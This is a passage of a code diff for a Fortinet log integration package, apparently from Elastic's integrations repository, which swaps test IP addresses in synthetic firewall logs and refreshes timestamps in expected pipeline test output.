srcport=53438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" 
service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" +<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 +<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" +<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=67.43.156.13 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=67.43.156.13 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" 
<188>date=2020-04-23 time=12:14:39 devname="firewall3" devid="oldfwid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230079841464445 tz="-0500" srcip=192.168.1.1 srcport=62493 srcintf="port1" srcintfrole="lan" dstip=192.168.100.100 dstport=1235 dstintf="newinterface" dstintfrole="undefined" sessionid=54234 proto=17 action="ip-conn" policyid=49 policytype="policy" poluuid="654cc-b6542-53467u8-e45234-1566casd35f7836" policyname="oldpolicyname" user="elasticsuper" authserver="FSSO_newfsso" service="udp/12302" dstcountry="Reserved" srccountry="Reserved" appcat="unscanned" crscore=5 craction=63332144 crlevel="low" -<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" -<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" 
direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" -<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK +<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" +<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" 
eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" +<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK diff --git a/packages/fortinet/changelog.yml b/packages/fortinet/changelog.yml index 80d5235de7b..2c7db9ccfeb 100644 --- a/packages/fortinet/changelog.yml +++ b/packages/fortinet/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json index 4192bc833e3..9d8f45c7cb2 100644 --- a/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/clientendpoint/_dev/test/pipeline/test-generated.log-expected.json 
@@ -6,7 +6,7 @@ }, "message": "January 29 06:09:59 boNemoe4402.www.invalid proto=udp service=http status=deny src=10.150.92.220 dst=10.102.123.34 src_port=7178 dst_port=3994 server_app=reeufugi pid=7880 app_name=enderitq traff_direct=external block_count=5286 logon_user=sumdo@litesse6379.api.domain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875135600Z" + "ingested": "2021-12-09T13:37:20.233978400Z" }, "tags": [ "preserve_original_event" @@ -18,7 +18,7 @@ }, "message": "February 12 13:12:33 olupt4880.api.home proto=icmp service=https status=deny src=10.33.212.159 dst=10.149.203.46 src_port=2789 dst_port=5861 server_app=vol pid=4539 app_name=uidolor traff_direct=internal block_count=4402 logon_user=mipsumq@gnaali6189.internal.localhost msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875149200Z" + "ingested": "2021-12-09T13:37:20.233988400Z" }, "tags": [ "preserve_original_event" @@ -30,7 +30,7 @@ }, "message": "February 26 20:15:08 aqu1628.internal.domain proto=ipv6-icmp service=smtp status=deny src=10.173.116.41 dst=10.118.175.9 src_port=3710 dst_port=2802 server_app=aer pid=445 app_name=nse traff_direct=unknown block_count=7019 logon_user=uame@quis1130.internal.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875154800Z" + "ingested": "2021-12-09T13:37:20.233993Z" }, "tags": [ "preserve_original_event" @@ -42,7 +42,7 @@ }, "message": "March 12 03:17:42 tinculp2940.internal.local proto=ggp service=https status=deny src=10.134.137.177 dst=10.202.204.154 src_port=7868 dst_port=3587 server_app=amco pid=5712 app_name=psumquia traff_direct=unknown block_count=2458 logon_user=orsitame@reprehe189.internal.home msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875158800Z" + "ingested": "2021-12-09T13:37:20.233998100Z" }, "tags": [ "preserve_original_event" 
@@ -54,7 +54,7 @@ }, "message": "March 26 10:20:16 rad2103.api.domain proto=ipv6-icmp service=pop3 status=deny src=10.245.142.250 dst=10.70.0.60 src_port=5408 dst_port=4982 server_app=estqui pid=6557 app_name=magn traff_direct=inbound block_count=2638 logon_user=eos@enimad2283.internal.domain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875164900Z" + "ingested": "2021-12-09T13:37:20.234003800Z" }, "tags": [ "preserve_original_event" @@ -66,7 +66,7 @@ }, "message": "April 9 17:22:51 enim5316.www5.local proto=ipv6-icmp service=smtp status=deny src=10.202.72.124 dst=10.200.188.142 src_port=4665 dst_port=7143 server_app=omnis pid=2061 app_name=eip traff_direct=external block_count=513 logon_user=iusmodt@doloreeu3553.www5.home msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875169600Z" + "ingested": "2021-12-09T13:37:20.234009100Z" }, "tags": [ "preserve_original_event" @@ -78,7 +78,7 @@ }, "message": "April 24 00:25:25 reetdolo2770.www5.local proto=tcp service=pop3 status=deny src=10.12.44.169 dst=10.214.225.125 src_port=5710 dst_port=2121 server_app=inBCSedu pid=5722 app_name=tanimi traff_direct=outbound block_count=6071 logon_user=erep@iutal13.api.localdomain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875176600Z" + "ingested": "2021-12-09T13:37:20.234013400Z" }, "tags": [ "preserve_original_event" @@ -90,7 +90,7 @@ }, "message": "May 8 07:27:59 isiu1114.internal.corp proto=icmp service=http status=deny src=10.66.108.11 dst=10.198.136.50 src_port=6875 dst_port=2089 server_app=ipis pid=5037 app_name=ari traff_direct=unknown block_count=3856 logon_user=uptatev@uovol492.www.localhost msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875183100Z" + "ingested": "2021-12-09T13:37:20.234018400Z" }, "tags": [ "preserve_original_event" 
@@ -102,7 +102,7 @@ }, "message": "May 22 14:30:33 usmodte1296.www.corp proto=igmp service=ms-wbt-server status=deny src=10.178.244.31 dst=10.69.20.77 src_port=3857 dst_port=7579 server_app=nonnu pid=776 app_name=riat traff_direct=unknown block_count=5575 logon_user=umdolor@osquir6997.corp msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875189200Z" + "ingested": "2021-12-09T13:37:20.234023Z" }, "tags": [ "preserve_original_event" @@ -114,7 +114,7 @@ }, "message": "June 5 21:33:08 tatno4987.www5.localhost proto=ggp service=pop3 status=deny src=10.54.231.100 dst=10.203.5.162 src_port=5616 dst_port=7290 server_app=iam pid=6096 app_name=ciati traff_direct=unknown block_count=3162 logon_user=umdolore@eniam7007.api.invalid msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875197900Z" + "ingested": "2021-12-09T13:37:20.234027200Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "June 20 04:35:42 tatno6787.internal.localhost proto=icmp service=pop3 status=deny src=10.65.83.160 dst=10.136.252.240 src_port=3592 dst_port=4105 server_app=uradi pid=7307 app_name=essequ traff_direct=outbound block_count=7148 logon_user=ender@snulapar3794.api.domain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875202700Z" + "ingested": "2021-12-09T13:37:20.234031600Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "July 4 11:38:16 essecill2595.mail.local proto=ggp service=http status=deny src=10.57.40.29 dst=10.210.213.18 src_port=7616 dst_port=3970 server_app=atuse pid=2703 app_name=uis traff_direct=internal block_count=6179 logon_user=onse@liq5883.localdomain msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875206900Z" + "ingested": "2021-12-09T13:37:20.234035400Z" }, "tags": [ "preserve_original_event" 
@@ -150,7 +150,7 @@ }, "message": "July 18 18:40:50 ali6446.localhost proto=udp service=smtp status=deny src=10.144.82.69 dst=10.200.156.102 src_port=2896 dst_port=6061 server_app=rporis pid=5166 app_name=par traff_direct=outbound block_count=7041 logon_user=rveli@rsint7026.test msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875211600Z" + "ingested": "2021-12-09T13:37:20.234040300Z" }, "tags": [ "preserve_original_event" @@ -162,7 +162,7 @@ }, "message": "August 2 01:43:25 torev7118.internal.domain proto=ipv6 service=smtp status=deny src=10.109.232.112 dst=10.72.58.135 src_port=5160 dst_port=2382 server_app=fugit pid=7668 app_name=rsitamet traff_direct=internal block_count=1112 logon_user=xea@qua2945.www.local msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875216400Z" + "ingested": "2021-12-09T13:37:20.234046600Z" }, "tags": [ "preserve_original_event" @@ -174,7 +174,7 @@ }, "message": "August 16 08:45:59 dolore6103.www5.example proto=udp service=http status=deny src=10.38.22.45 dst=10.72.29.73 src_port=1493 dst_port=203 server_app=piscing pid=1044 app_name=entsu traff_direct=unknown block_count=4979 logon_user=onproide@luptat6494.www.example msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875222400Z" + "ingested": "2021-12-09T13:37:20.234052800Z" }, "tags": [ "preserve_original_event" @@ -186,7 +186,7 @@ }, "message": "August 30 15:48:33 errorsi6996.www.domain proto=tcp service=smtp status=deny src=10.70.95.74 dst=10.76.72.111 src_port=6119 dst_port=7388 server_app=emaperi pid=7183 app_name=sumquiad traff_direct=internal block_count=2362 logon_user=ivelits@moenimi6317.internal.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875227400Z" + "ingested": "2021-12-09T13:37:20.234059Z" }, "tags": [ "preserve_original_event" 
@@ -198,7 +198,7 @@ }, "message": "September 13 22:51:07 lumquido5839.api.corp proto=ipv6 service=https status=deny src=10.19.201.13 dst=10.73.69.75 src_port=5006 dst_port=6218 server_app=nsec pid=6907 app_name=estqu traff_direct=unknown block_count=2655 logon_user=tat@tion1761.home msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875231500Z" + "ingested": "2021-12-09T13:37:20.234065300Z" }, "tags": [ "preserve_original_event" @@ -210,7 +210,7 @@ }, "message": "September 28 05:53:42 aperia4409.www5.invalid proto=rdp service=ms-wbt-server status=deny src=10.78.151.178 dst=10.84.105.75 src_port=1846 dst_port=98 server_app=uames pid=499 app_name=msequi traff_direct=external block_count=4085 logon_user=iquaUten@santium4235.api.local msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875237600Z" + "ingested": "2021-12-09T13:37:20.234071500Z" }, "tags": [ "preserve_original_event" @@ -222,7 +222,7 @@ }, "message": "October 12 12:56:16 tem2496.api.lan proto=rdp service=ms-wbt-server status=deny src=10.135.233.146 dst=10.25.192.202 src_port=4181 dst_port=6462 server_app=ents pid=1531 app_name=Loremip traff_direct=internal block_count=4610 logon_user=emeumfu@CSed2857.www5.example msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875248600Z" + "ingested": "2021-12-09T13:37:20.234077800Z" }, "tags": [ "preserve_original_event" @@ -234,7 +234,7 @@ }, "message": "October 26 19:58:50 eme6710.mail.invalid proto=rdp service=https status=deny src=10.121.219.204 dst=10.104.134.200 src_port=3611 dst_port=2508 server_app=reetd pid=6051 app_name=quae traff_direct=outbound block_count=7084 logon_user=uptat@equep5085.mail.domain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875253300Z" + "ingested": "2021-12-09T13:37:20.234084Z" }, "tags": [ "preserve_original_event" 
@@ -246,7 +246,7 @@ }, "message": "November 10 03:01:24 ihilm1669.mail.invalid proto=tcp service=https status=deny src=10.191.105.82 dst=10.225.160.182 src_port=3361 dst_port=4810 server_app=uovolup pid=6994 app_name=llu traff_direct=external block_count=3936 logon_user=eirure@conseq557.mail.lan msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875257Z" + "ingested": "2021-12-09T13:37:20.234090200Z" }, "tags": [ "preserve_original_event" @@ -258,7 +258,7 @@ }, "message": "November 24 10:03:59 umexerci1284.internal.localdomain proto=rdp service=smtp status=deny src=10.141.44.153 dst=10.161.57.8 src_port=3750 dst_port=2716 server_app=oei pid=5200 app_name=snostrud traff_direct=inbound block_count=3333 logon_user=quisnos@ite2026.www.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875263400Z" + "ingested": "2021-12-09T13:37:20.234096700Z" }, "tags": [ "preserve_original_event" @@ -270,7 +270,7 @@ }, "message": "December 8 17:06:33 adol485.example proto=udp service=https status=deny src=10.153.111.103 dst=10.6.167.7 src_port=4977 dst_port=2022 server_app=taevit pid=3365 app_name=nsecte traff_direct=internal block_count=7424 logon_user=eumfug@lit5929.test msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875269200Z" + "ingested": "2021-12-09T13:37:20.234102900Z" }, "tags": [ "preserve_original_event" @@ -282,7 +282,7 @@ }, "message": "December 23 00:09:07 evita5008.www.localdomain proto=ggp service=pop3 status=deny src=10.248.204.182 dst=10.134.148.219 src_port=1331 dst_port=4430 server_app=tmo pid=1835 app_name=abi traff_direct=inbound block_count=4168 logon_user=uioffi@oru6938.invalid msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875277100Z" + "ingested": "2021-12-09T13:37:20.234112600Z" }, "tags": [ "preserve_original_event" 
@@ -294,7 +294,7 @@ }, "message": "January 6 07:11:41 tsedqu2456.www5.invalid proto=ipv6 service=smtp status=deny src=10.178.77.231 dst=10.163.5.243 src_port=5294 dst_port=4129 server_app=xerc pid=2019 app_name=hitecto traff_direct=unknown block_count=1123 logon_user=liquide@etdol5473.local msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875281600Z" + "ingested": "2021-12-09T13:37:20.234119100Z" }, "tags": [ "preserve_original_event" @@ -306,7 +306,7 @@ }, "message": "January 20 14:14:16 ris3314.mail.invalid proto=ggp service=smtp status=deny src=10.177.194.18 dst=10.221.89.228 src_port=766 dst_port=2447 server_app=uamei pid=2493 app_name=aera traff_direct=outbound block_count=1747 logon_user=aliquam@nimid893.mail.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875287800Z" + "ingested": "2021-12-09T13:37:20.234125400Z" }, "tags": [ "preserve_original_event" @@ -318,7 +318,7 @@ }, "message": "February 3 21:16:50 reme622.mail.example proto=icmp service=ms-wbt-server status=deny src=10.241.65.49 dst=10.32.239.1 src_port=3027 dst_port=3128 server_app=dictasu pid=3022 app_name=catc traff_direct=unknown block_count=3522 logon_user=idata@rumwritt6003.host msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875292800Z" + "ingested": "2021-12-09T13:37:20.234131600Z" }, "tags": [ "preserve_original_event" @@ -330,7 +330,7 @@ }, "message": "February 18 04:19:24 non3341.mail.invalid proto=ggp service=http status=deny src=10.168.90.81 dst=10.101.57.120 src_port=6866 dst_port=6501 server_app=laboree pid=2328 app_name=intocc traff_direct=internal block_count=5516 logon_user=eporr@xeacomm6855.api.corp msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875296800Z" + "ingested": "2021-12-09T13:37:20.234137100Z" }, "tags": [ "preserve_original_event" 
@@ -342,7 +342,7 @@ }, "message": "March 4 11:21:59 ris727.api.local proto=tcp service=ms-wbt-server status=deny src=10.14.211.43 dst=10.130.14.60 src_port=4456 dst_port=2051 server_app=autfu pid=1156 app_name=tessec traff_direct=external block_count=7200 logon_user=litse@icabo4125.mail.domain msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875302700Z" + "ingested": "2021-12-09T13:37:20.234140900Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "March 18 18:24:33 stquido5705.api.host proto=icmp service=http status=deny src=10.60.129.15 dst=10.248.101.25 src_port=106 dst_port=5740 server_app=Nequepo pid=6003 app_name=pora traff_direct=unknown block_count=6437 logon_user=evolup@ionofdeF5643.www.localhost msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875311400Z" + "ingested": "2021-12-09T13:37:20.234145700Z" }, "tags": [ "preserve_original_event" @@ -366,7 +366,7 @@ }, "message": "April 2 01:27:07 etcons7378.api.lan proto=tcp service=https status=deny src=10.72.93.28 dst=10.111.187.12 src_port=3577 dst_port=3994 server_app=aper pid=5651 app_name=tur traff_direct=inbound block_count=3427 logon_user=niamqui@orem6702.invalid msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875316400Z" + "ingested": "2021-12-09T13:37:20.234151300Z" }, "tags": [ "preserve_original_event" @@ -378,7 +378,7 @@ }, "message": "April 16 08:29:41 vita2681.www5.local proto=icmp service=ms-wbt-server status=deny src=10.27.14.168 dst=10.66.2.232 src_port=2224 dst_port=5764 server_app=fugiatn pid=3470 app_name=ipsumd traff_direct=outbound block_count=6708 logon_user=uirati@oin6780.mail.domain msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875320200Z" + "ingested": "2021-12-09T13:37:20.234156600Z" }, "tags": [ "preserve_original_event" 
@@ -390,7 +390,7 @@ }, "message": "April 30 15:32:16 tnulapa7592.www.local proto=ggp service=ms-wbt-server status=deny src=10.75.99.127 dst=10.195.2.130 src_port=1766 dst_port=202 server_app=mporin pid=6932 app_name=nisiuta traff_direct=internal block_count=3828 logon_user=inibusB@eprehen3224.www5.localdomain msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875324700Z" + "ingested": "2021-12-09T13:37:20.234160900Z" }, "tags": [ "preserve_original_event" @@ -402,7 +402,7 @@ }, "message": "May 14 22:34:50 lup2134.www.localhost proto=ipv6 service=pop3 status=deny src=10.201.238.90 dst=10.245.104.182 src_port=3759 dst_port=55 server_app=ccaecat pid=6945 app_name=onsequ traff_direct=outbound block_count=4198 logon_user=ovol@ptasn6599.www.localhost msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875329400Z" + "ingested": "2021-12-09T13:37:20.234165900Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "May 29 05:37:24 tanimid3337.mail.corp proto=ipv6-icmp service=http status=deny src=10.217.150.196 dst=10.105.91.31 src_port=2056 dst_port=5987 server_app=loreme pid=853 app_name=psumquia traff_direct=external block_count=4444 logon_user=con@nisist2752.home msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875333400Z" + "ingested": "2021-12-09T13:37:20.234170400Z" }, "tags": [ "preserve_original_event" @@ -426,7 +426,7 @@ }, "message": "June 12 12:39:58 eumiu765.api.lan proto=ipv6-icmp service=https status=deny src=10.4.157.1 dst=10.184.18.202 src_port=52 dst_port=205 server_app=ofdeFini pid=4153 app_name=molli traff_direct=outbound block_count=725 logon_user=oditem@gitsedqu2649.mail.lan msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875339500Z" + "ingested": "2021-12-09T13:37:20.234174500Z" }, "tags": [ "preserve_original_event" 
@@ -438,7 +438,7 @@ }, "message": "June 26 19:42:33 mquelau5326.mail.lan proto=icmp service=https status=deny src=10.255.39.252 dst=10.113.95.59 src_port=863 dst_port=4367 server_app=fugitsed pid=1693 app_name=idolo traff_direct=internal block_count=3147 logon_user=persp@entsunt3962.www.example msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875344500Z" + "ingested": "2021-12-09T13:37:20.234178900Z" }, "tags": [ "preserve_original_event" @@ -450,7 +450,7 @@ }, "message": "July 11 02:45:07 idestlab2631.www.lan proto=tcp service=http status=deny src=10.27.16.118 dst=10.83.177.2 src_port=18 dst_port=1827 server_app=iat pid=337 app_name=rinre traff_direct=internal block_count=1300 logon_user=borios@tut2703.www.host msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875348400Z" + "ingested": "2021-12-09T13:37:20.234182700Z" }, "tags": [ "preserve_original_event" @@ -462,7 +462,7 @@ }, "message": "July 25 09:47:41 inesci6789.test proto=udp service=http status=deny src=10.38.54.72 dst=10.167.227.44 src_port=6595 dst_port=5736 server_app=lillum pid=7041 app_name=its traff_direct=outbound block_count=7644 logon_user=riamea@entorev160.test msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875355300Z" + "ingested": "2021-12-09T13:37:20.234187500Z" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "message": "August 8 16:50:15 ccaeca7077.internal.corp proto=tcp service=http status=deny src=10.216.54.184 dst=10.215.205.216 src_port=1495 dst_port=647 server_app=riat pid=3854 app_name=psaquaea traff_direct=external block_count=7536 logon_user=ameiusm@proide3714.mail.localdomain msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875364100Z" + "ingested": "2021-12-09T13:37:20.234193700Z" }, "tags": [ "preserve_original_event" 
@@ -486,7 +486,7 @@ }, "message": "August 22 23:52:50 ima2031.api.corp proto=igmp service=smtp status=deny src=10.9.12.248 dst=10.9.18.237 src_port=765 dst_port=2486 server_app=tpersp pid=55 app_name=seosqui traff_direct=internal block_count=6379 logon_user=uradi@tot5313.mail.invalid msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875372600Z" + "ingested": "2021-12-09T13:37:20.234200Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "September 6 06:55:24 ian867.internal.corp proto=rdp service=https status=deny src=10.83.130.226 dst=10.41.123.102 src_port=1542 dst_port=2300 server_app=odoconse pid=228 app_name=quatu traff_direct=external block_count=7661 logon_user=tenim@rumet3801.internal.domain msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875378800Z" + "ingested": "2021-12-09T13:37:20.234206100Z" }, "tags": [ "preserve_original_event" @@ -510,7 +510,7 @@ }, "message": "September 20 13:57:58 lorin4249.corp proto=tcp service=pop3 status=deny src=10.175.112.197 dst=10.80.152.108 src_port=1749 dst_port=2742 server_app=exeacom pid=4253 app_name=rita traff_direct=outbound block_count=6984 logon_user=tametcon@liqua2834.www5.lan msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875382600Z" + "ingested": "2021-12-09T13:37:20.234212300Z" }, "tags": [ "preserve_original_event" @@ -522,7 +522,7 @@ }, "message": "October 4 21:00:32 gnaaliqu3935.api.test proto=udp service=smtp status=deny src=10.134.18.114 dst=10.142.25.100 src_port=2761 dst_port=5770 server_app=mdol pid=2200 app_name=nby traff_direct=internal block_count=624 logon_user=osqui@sequat7273.api.host msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875388500Z" + "ingested": "2021-12-09T13:37:20.234218500Z" }, "tags": [ "preserve_original_event" 
@@ -534,7 +534,7 @@ }, "message": "October 19 04:03:07 nsequat1859.internal.localhost proto=udp service=http status=deny src=10.28.118.160 dst=10.223.119.218 src_port=6247 dst_port=300 server_app=umexerc pid=5717 app_name=intocc traff_direct=internal block_count=4387 logon_user=ntsunt@uidol4575.localhost msg=failure", "event": { - "ingested": "2021-06-29T09:32:53.875394900Z" + "ingested": "2021-12-09T13:37:20.234224600Z" }, "tags": [ "preserve_original_event" @@ -546,7 +546,7 @@ }, "message": "November 2 11:05:41 ritin2495.api.corp proto=ggp service=https status=deny src=10.110.114.175 dst=10.47.28.48 src_port=4986 dst_port=3032 server_app=tatem pid=4469 app_name=luptat traff_direct=unknown block_count=4488 logon_user=plicab@oremq2000.api.corp msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875398700Z" + "ingested": "2021-12-09T13:37:20.234230800Z" }, "tags": [ "preserve_original_event" @@ -558,7 +558,7 @@ }, "message": "November 16 18:08:15 tetur2694.mail.local proto=ggp service=pop3 status=deny src=10.40.251.202 dst=10.90.33.138 src_port=5733 dst_port=7876 server_app=enimadmi pid=5524 app_name=lupta traff_direct=external block_count=6847 logon_user=nvolupt@oremi1485.api.localhost msg=success", "event": { - "ingested": "2021-06-29T09:32:53.875406500Z" + "ingested": "2021-12-09T13:37:20.234236900Z" }, "tags": [ "preserve_original_event" @@ -570,7 +570,7 @@ }, "message": "December 1 01:10:49 rem7043.localhost proto=ipv6 service=ms-wbt-server status=deny src=10.65.2.106 dst=10.227.173.252 src_port=5410 dst_port=5337 server_app=nisiut pid=3624 app_name=teturad traff_direct=external block_count=7576 logon_user=itation@sequatD5469.www5.lan msg=unknown", "event": { - "ingested": "2021-06-29T09:32:53.875417600Z" + "ingested": 